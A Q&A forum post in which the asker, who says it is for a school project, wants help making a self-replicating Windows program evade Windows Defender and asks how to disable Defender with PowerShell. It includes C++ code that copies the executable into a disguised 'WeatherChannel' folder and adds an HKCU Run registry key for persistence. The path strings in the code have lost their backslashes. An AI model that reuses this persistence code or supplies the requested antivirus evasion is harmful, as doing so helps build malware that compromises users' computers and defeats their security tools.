Avoid Antivirus detection C++

  antivirus, assembly, c++, malware-detection, windows

For a school project, I’m developing a tiny malware that replicate itself and autorun with reg keys.

I want my program to set a reg key to autorun but when I do it Windows defender detect the RegSetValueExA function from windows.h. I also want my program to execute without administrator privilege.

My teacher told me that it’s possible to avoid the detection. I have to detect when WD look at my program and tell it to stop/sleep while WD perform the scan. He also told me that it’s possible to disable WD with powershell. But I don’t really know how to it.

Here’s the code that triggers Windows Defender:

void Victim::replicateNpersist()
{
  char filename[ MAX_PATH ];

  // Declaration of the directory that contain the malware
  string Dir = "C:Users"+string(c_user)+"AppDataLocalWeatherChannel";
  int LDir = Dir.length();
  char dirPath[LDir+1];
  strcpy(dirPath, Dir.c_str());

  // Declaration of the object to copy
  string Dest = "C:Users"+c_user+"AppDataLocalWeatherChannelWeather.exe";
  int LDest = Dest.length();
  char newLocation[LDest+1];
  strcpy(newLocation,Dest.c_str());

  // Creation of directory
  CreateDirectoryA(dirPath, NULL);
  BOOL stats=0;
  DWORD size = GetModuleFileNameA(NULL, filename, MAX_PATH);
  CopyFileA(filename, newLocation, stats);

  // Persistence
  HKEY hKey;
  LPCSTR keyPath = "SOFTWAREMicrosoftWindowsCurrentVersionRun";
  LONG lnRes = RegOpenKeyExA(HKEY_CURRENT_USER, keyPath,0,KEY_WRITE,&hKey);
  if(lnRes == ERROR_SUCCESS) {
  RegSetValueExA(hKey,"Weather.exe", 0, REG_SZ,(LPBYTE)newLocation,strlen(newLocation)+1);    
 }
}

Source: Windows Questions

LEAVE A COMMENT